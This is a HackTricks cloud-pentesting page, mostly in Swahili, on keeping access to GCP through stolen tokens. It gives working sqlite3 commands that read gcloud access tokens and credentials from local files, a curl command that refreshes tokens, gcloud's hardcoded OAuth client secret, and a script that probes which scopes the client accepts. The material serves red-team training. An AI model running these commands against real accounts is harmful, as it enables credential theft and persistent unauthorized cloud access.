GCP - Token Persistance

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Authenticated User Tokens

Ili kupata token ya sasa ya mtumiaji unaweza kukimbia:

sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='<email>';"

Angalia katika ukurasa huu jinsi ya kutumia moja kwa moja tokeni hii kwa kutumia gcloud:

Ili kupata maelezo ya kuunda tokeni mpya ya ufikiaji endesha:

sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where account_id='<email>';"

Pia inawezekana kupata refresh tokens katika $HOME/.config/gcloud/application_default_credentials.json na katika $HOME/.config/gcloud/legacy_credentials/*/adc.json.

Ili kupata access token mpya iliyosasishwa kwa kutumia refresh token, client ID, na client secret, endesha:

curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token

Uhalali wa refresh tokens unaweza kudhibitiwa katika Admin > Security > Google Cloud session control, na kwa default umewekwa kwa masaa 16 ingawa unaweza kuwekwa kutokufa milele:

Auth flow

Mchakato wa uthibitishaji unapokuwa ukitumia kitu kama gcloud auth login utafungua dirisha katika kivinjari na baada ya kukubali maeneo yote kivinjari kitatumia ombi kama hili kwa bandari ya http iliyo wazi na chombo:

/?state=EN5AK1GxwrEKgKog9ANBm0qDwWByYO&code=4/0AeaYSHCllDzZCAt2IlNWjMHqr4XKOuNuhOL-TM541gv-F6WOUsbwXiUgMYvo4Fg0NGzV9A&scope=email%20openid%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/cloud-platform%20https://www.googleapis.com/auth/appengine.admin%20https://www.googleapis.com/auth/sqlservice.login%20https://www.googleapis.com/auth/compute%20https://www.googleapis.com/auth/accounts.reauth&authuser=0&prompt=consent HTTP/1.1

Then, gcloud itatumia hali na msimbo pamoja na client_id iliyo hardcoded (32555940559.apps.googleusercontent.com) na client_secret (ZmssLNjJy2998hD4CTg2ejr2) kupata data ya mwisho ya refresh token.

Kumbuka kwamba mawasiliano na localhost yako katika HTTP, hivyo inawezekana kukamata data ili kupata refresh token, hata hivyo data hii ni halali mara 1 tu, hivyo hii itakuwa haina maana, ni rahisi tu kusoma refresh token kutoka kwa faili.

OAuth Scopes

Unaweza kupata scopes zote za Google katika https://developers.google.com/identity/protocols/oauth2/scopes au kupata hizo kwa kutekeleza:

curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-A/\-\._]*' | sort -u

Inawezekana kuona ni mipaka gani programu ambayo gcloud inatumia kujiandikisha inaweza kusaidia kwa kutumia skripti hii:

curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope         \r"
if ! curl -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then
echo ""
echo $scope
fi
done

Baada ya kuitekeleza, ilikaguliwa kwamba programu hii inasaidia maeneo haya:

https://www.googleapis.com/auth/appengine.admin
https://www.googleapis.com/auth/bigquery
https://www.googleapis.com/auth/cloud-platform
https://www.googleapis.com/auth/compute
https://www.googleapis.com/auth/devstorage.full_control
https://www.googleapis.com/auth/drive
https://www.googleapis.com/auth/userinfo.email

ni ya kuvutia kuona jinsi programu hii inavyounga mkono drive scope, ambayo inaweza kumruhusu mtumiaji kupandisha kutoka GCP hadi Workspace ikiwa mshambuliaji atafanikiwa kumlazimisha mtumiaji kuunda tokeni na scope hii.

Angalia jinsi ya kudhulumu hii hapa.

Akaunti za Huduma

Kama ilivyo kwa watumiaji walioidhinishwa, ikiwa utafanikiwa kudhoofisha faili ya ufunguo wa faragha ya akaunti ya huduma utaweza kuipata kawaida kwa muda wote unavyotaka. Hata hivyo, ikiwa utachukua tokeni ya OAuth ya akaunti ya huduma hii inaweza kuwa ya kuvutia zaidi, kwa sababu, hata kama kwa kawaida tokeni hizi zinatumika kwa saa moja tu, ikiwa mhasiriwa atafuta ufunguo wa faragha wa api, tokeni ya OAuh itabaki kuwa halali hadi itakapokwisha.

Metadata

Kwa wazi, kadri unavyokuwa ndani ya mashine inayofanya kazi katika mazingira ya GCP utaweza kupata akaunti ya huduma iliyoambatanishwa na mashine hiyo kwa kuwasiliana na mwisho wa metadata (zingatia kwamba tokeni za Oauth unazoweza kupata katika mwisho huu kwa kawaida zinapunguziliwa mbali na scopes).

Marekebisho

Marekebisho kadhaa kwa mbinu hizi yanaelezwa katika https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2

Marejeo

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousGCP - Storage Persistence NextGCP - Services

Last updated 3 days ago

curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token

/?state=EN5AK1GxwrEKgKog9ANBm0qDwWByYO&code=4/0AeaYSHCllDzZCAt2IlNWjMHqr4XKOuNuhOL-TM541gv-F6WOUsbwXiUgMYvo4Fg0NGzV9A&scope=email%20openid%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/cloud-platform%20https://www.googleapis.com/auth/appengine.admin%20https://www.googleapis.com/auth/sqlservice.login%20https://www.googleapis.com/auth/compute%20https://www.googleapis.com/auth/accounts.reauth&authuser=0&prompt=consent HTTP/1.1

curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do echo -ne "Testing $scope \r" if ! curl -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then echo "" echo $scope fi done

https://www.googleapis.com/auth/appengine.admin https://www.googleapis.com/auth/bigquery https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/devstorage.full_control https://www.googleapis.com/auth/drive https://www.googleapis.com/auth/userinfo.email